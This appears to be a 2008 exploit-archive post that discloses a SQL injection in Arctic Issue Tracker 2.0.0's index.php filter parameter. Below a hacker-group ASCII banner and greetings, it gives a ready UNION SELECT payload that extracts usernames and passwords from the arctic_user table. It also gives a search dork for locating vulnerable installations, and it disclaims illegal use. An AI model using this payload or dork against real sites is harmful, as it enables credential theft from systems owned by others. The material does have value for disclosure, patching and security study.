Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability

2008-07-17 00:00:00

IloveYouTryaG
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: Remote SQL Injection

Author :: QTRinu x [ Qataro (at) hotmail (dot) Com ]
Application :: Arctic Issue Tracker v2.0.0

Download :: http://www.arctictracker.com
Price :: $99.95 USD
Dork 1 :: Powered by Arctic v2.0.0

ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------

Vulnerability: http:// Localhost / (Path Script) / index.php?filter= [SQL]

SQL : -1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--

-------------------------------------------[End of context]----------------------------------------
thanx str0ke/*

#

Fixes

No fixes

In order to submit a new fix you need to be registered.